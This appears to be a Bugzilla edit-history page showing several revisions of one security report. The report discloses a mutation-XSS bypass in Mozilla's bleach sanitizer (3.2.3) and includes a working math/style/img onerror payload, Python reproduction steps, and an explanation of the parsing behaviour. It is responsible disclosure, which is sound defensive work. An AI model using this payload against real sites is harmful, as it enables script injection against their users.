Copying a report from Yaniv Nizry (CC'd) to security@ <TODO> copy here
Bug 1689399 Comment 0 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
Copying a report from Yaniv Nizry (CC'd) to security@:
Hello,
My name is Yaniv Nizry and I’m a security analyst at Checkmarx's CxSCA group.
Checkmarx is a global software security company aiming for the safer usage of code and libraries.
I recently found another mXSS vulnerability in Mozilla-bleach.
Steps to reproduce:
Have strip_comments set to False and allow math/svg, p, and style tag.
Clean the following: <math></p><style><!--</style><img src/onerror=alert(1)>
Bleach output: <math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>
After parsing it again in the browser:
Expected results:
Alert 1 will pop on the browser.
Details:
In HTML the ‘p’ tag (and also ‘br’) are the only tags that will be created with just an end tag (e.g. </p> == <p></p> on the other hand </a> == nothing).
Also, in the math/svg namespace there are tags that stop the namespace and breaks out of the namespace, e.g. (using img as a breaker):
<svg><img></svg> == <svg><img></svg>
<svg><style></svg> == <svg><style></style></svg> == style is not a breaker
<svg><img><style></style></svg> == <svg></svg><img><style></style> == the breaker ejects elements that come after.
The parsing issue here is when passing p as an end tag it doesn’t count as a namespace breaker, see how parsing twice will change the output:
So going back to our PoC, at first the style tag is in svg/math namespace so the comment is like an html comment, then when parsing again on the browser the p tag breaks the style out of the svg/math namespace changing it to and html namespace style.
Now there is no comment and there is an img tag.
Bugzilla account - https://bugzilla.mozilla.org/user_profile?user_id=657031
Feel free to contact us for any questions.
Best regards,
Yaniv
Copying a report from Yaniv Nizry (CC'd) to security@: Hello, My name is Yaniv Nizry and I’m a security analyst at Checkmarx's CxSCA group. Checkmarx is a global software security company aiming for the safer usage of code and libraries. I recently found another mXSS vulnerability in Mozilla-bleach. Steps to reproduce: 1. Have strip_comments set to False and allow `math/svg`, `p`, and `style` tag. 1. Clean the following: `<math></p><style><!--</style><img src/onerror=alert(1)> 1. Bleach output: `<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>` ```python >>> import bleach >>> bleach.__version__ '3.2.3' >>> bleach.clean(': <math></p><style><!--</style><img src/onerror=alert(1)>', tags=['math', 'p', 'style'], strip_comments=False) '<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>' ``` After parsing it again in the browser: Expected results: Alert 1 will pop on the browser. Details: In HTML the ‘p’ tag (and also ‘br’) are the only tags that will be created with just an end tag (e.g. </p> == <p></p> on the other hand </a> == nothing). Also, in the math/svg namespace there are tags that stop the namespace and breaks out of the namespace, e.g. (using img as a breaker): <svg><img></svg> == <svg><img></svg> <svg><style></svg> == <svg><style></style></svg> == style is not a breaker <svg><img><style></style></svg> == <svg></svg><img><style></style> == the breaker ejects elements that come after. The parsing issue here is when passing p as an end tag it doesn’t count as a namespace breaker, see how parsing twice will change the output: So going back to our PoC, at first the style tag is in svg/math namespace so the comment is like an html comment, then when parsing again on the browser the p tag breaks the style out of the svg/math namespace changing it to and html namespace style. Now there is no comment and there is an img tag. Bugzilla account - https://bugzilla.mozilla.org/user_profile?user_id=657031 Feel free to contact us for any questions. Best regards, Yaniv
Copying a report from Yaniv Nizry (CC'd) to security@: Hello, My name is Yaniv Nizry and I’m a security analyst at Checkmarx's CxSCA group. Checkmarx is a global software security company aiming for the safer usage of code and libraries. I recently found another mXSS vulnerability in Mozilla-bleach. Steps to reproduce: 1. Have strip_comments set to False and allow `math/svg`, `p`, and `style` tag. 1. Clean the following: `<math></p><style><!--</style><img src/onerror=alert(1)> 1. Bleach output: `<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>` ```python >>> import bleach >>> bleach.__version__ '3.2.3' >>> bleach.clean(': <math></p><style><!--</style><img src/onerror=alert(1)>', tags=['math', 'p', 'style'], strip_comments=False) '<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>' ``` After parsing it again in the browser: ```html <html> <head></head> <body> <math></math> <p></p> <style><!--</style> <img src(unknown) onerror="alert(1)"> "--> " </body> </html> ``` Expected results: Alert 1 will pop on the browser. Details: In HTML the ‘p’ tag (and also ‘br’) are the only tags that will be created with just an end tag (e.g. </p> == <p></p> on the other hand </a> == nothing). Also, in the math/svg namespace there are tags that stop the namespace and breaks out of the namespace, e.g. (using img as a breaker): <svg><img></svg> == <svg><img></svg> <svg><style></svg> == <svg><style></style></svg> == style is not a breaker <svg><img><style></style></svg> == <svg></svg><img><style></style> == the breaker ejects elements that come after. The parsing issue here is when passing p as an end tag it doesn’t count as a namespace breaker, see how parsing twice will change the output: So going back to our PoC, at first the style tag is in svg/math namespace so the comment is like an html comment, then when parsing again on the browser the p tag breaks the style out of the svg/math namespace changing it to and html namespace style. Now there is no comment and there is an img tag. Bugzilla account - https://bugzilla.mozilla.org/user_profile?user_id=657031 Feel free to contact us for any questions. Best regards, Yaniv
Copying a report from Yaniv Nizry (CC'd) to security@: Hello, My name is Yaniv Nizry and I’m a security analyst at Checkmarx's CxSCA group. Checkmarx is a global software security company aiming for the safer usage of code and libraries. I recently found another mXSS vulnerability in Mozilla-bleach. **Steps to reproduce:** 1. Have strip_comments set to False and allow `math/svg`, `p`, and `style` tag. 1. Clean the following: `<math></p><style><!--</style><img src/onerror=alert(1)> 1. Bleach output: `<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>` ```python >>> import bleach >>> bleach.__version__ '3.2.3' >>> bleach.clean(': <math></p><style><!--</style><img src/onerror=alert(1)>', tags=['math', 'p', 'style'], strip_comments=False) '<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>' ``` 4. After parsing it again in the browser: ```html <html> <head></head> <body> <math></math> <p></p> <style><!--</style> <img src(unknown) onerror="alert(1)"> "--> " </body> </html> ``` **Expected results:** Alert 1 will pop on the browser. **Details:** In HTML the ‘p’ tag (and also ‘br’) are the only tags that will be created with just an end tag (e.g. </p> == <p></p> on the other hand </a> == nothing). Also, in the math/svg namespace there are tags that stop the namespace and breaks out of the namespace, e.g. (using img as a breaker): <svg><img></svg> == <svg><img></svg> <svg><style></svg> == <svg><style></style></svg> == style is not a breaker <svg><img><style></style></svg> == <svg></svg><img><style></style> == the breaker ejects elements that come after. The parsing issue here is when passing p as an end tag it doesn’t count as a namespace breaker, see how parsing twice will change the output: So going back to our PoC, at first the style tag is in svg/math namespace so the comment is like an html comment, then when parsing again on the browser the p tag breaks the style out of the svg/math namespace changing it to and html namespace style. Now there is no comment and there is an img tag. Bugzilla account - https://bugzilla.mozilla.org/user_profile?user_id=657031 Feel free to contact us for any questions. Best regards, Yaniv
Copying a report from Yaniv Nizry (CC'd) to security@: Hello, My name is Yaniv Nizry and I’m a security analyst at Checkmarx's CxSCA group. Checkmarx is a global software security company aiming for the safer usage of code and libraries. I recently found another mXSS vulnerability in Mozilla-bleach. **Steps to reproduce:** 1. Have strip_comments set to False and allow `math/svg`, `p`, and `style` tag. 1. Clean the following: `<math></p><style><!--</style><img src/onerror=alert(1)> 1. Bleach output: `<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>` ```python >>> import bleach >>> bleach.__version__ '3.2.3' >>> bleach.clean(': <math></p><style><!--</style><img src/onerror=alert(1)>', tags=['math', 'p', 'style'], strip_comments=False) '<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>' ``` 4. After parsing it again in the browser: ```html <html> <head></head> <body> <math></math> <p></p> <style><!--</style> <img src(unknown) onerror="alert(1)"> "--> " </body> </html> ``` **Expected results:** Alert 1 will pop on the browser. **Details:** In HTML the ‘p’ tag (and also ‘br’) are the only tags that will be created with just an end tag (e.g. </p> == <p></p> on the other hand </a> == nothing). Also, in the math/svg namespace there are tags that stop the namespace and breaks out of the namespace, e.g. (using img as a breaker): `<svg><img></svg> == <svg><img></svg>` `<svg><style></svg> == <svg><style></style></svg> ==` style is not a breaker `<svg><img><style></style></svg> == <svg></svg><img><style></style> ==` the breaker ejects elements that come after. The parsing issue here is when passing p as an end tag it doesn’t count as a namespace breaker, see how parsing twice will change the output: ```python >>> bleach.clean("<math><p>", tags=["math", "p"]) '<math><p></p></math>' >>> bleach.clean("<math><p></p></math>", tags=["math", "p"]) '<math></math><p></p>' ``` So going back to our PoC, at first the style tag is in svg/math namespace so the comment is like an html comment, then when parsing again on the browser the p tag breaks the style out of the svg/math namespace changing it to and html namespace style. Now there is no comment and there is an img tag. Bugzilla account - https://bugzilla.mozilla.org/user_profile?user_id=657031 Feel free to contact us for any questions. Best regards, Yaniv
Copying a report from Yaniv Nizry (CC'd) to security@: Hello, My name is Yaniv Nizry and I’m a security analyst at Checkmarx's CxSCA group. Checkmarx is a global software security company aiming for the safer usage of code and libraries. I recently found another mXSS vulnerability in Mozilla-bleach. **Steps to reproduce:** 1. Have strip_comments set to False and allow `math/svg`, `p`, and `style` tag. 1. Clean the following: `<math></p><style><!--</style><img src/onerror=alert(1)> 1. Bleach output: `<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>` ```python >>> import bleach >>> bleach.__version__ '3.2.3' >>> bleach.clean('<math></p><style><!--</style><img src/onerror=alert(1)>', tags=['math', 'p', 'style'], strip_comments=False) '<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>' ``` 4. After parsing it again in the browser: ```html <html> <head></head> <body> <math></math> <p></p> <style><!--</style> <img src(unknown) onerror="alert(1)"> "--> " </body> </html> ``` **Expected results:** Alert 1 will pop on the browser. **Details:** In HTML the ‘p’ tag (and also ‘br’) are the only tags that will be created with just an end tag (e.g. </p> == <p></p> on the other hand </a> == nothing). Also, in the math/svg namespace there are tags that stop the namespace and breaks out of the namespace, e.g. (using img as a breaker): `<svg><img></svg> == <svg><img></svg>` `<svg><style></svg> == <svg><style></style></svg> ==` style is not a breaker `<svg><img><style></style></svg> == <svg></svg><img><style></style> ==` the breaker ejects elements that come after. The parsing issue here is when passing p as an end tag it doesn’t count as a namespace breaker, see how parsing twice will change the output: ```python >>> bleach.clean("<math><p>", tags=["math", "p"]) '<math><p></p></math>' >>> bleach.clean("<math><p></p></math>", tags=["math", "p"]) '<math></math><p></p>' ``` So going back to our PoC, at first the style tag is in svg/math namespace so the comment is like an html comment, then when parsing again on the browser the p tag breaks the style out of the svg/math namespace changing it to and html namespace style. Now there is no comment and there is an img tag. Bugzilla account - https://bugzilla.mozilla.org/user_profile?user_id=657031 Feel free to contact us for any questions. Best regards, Yaniv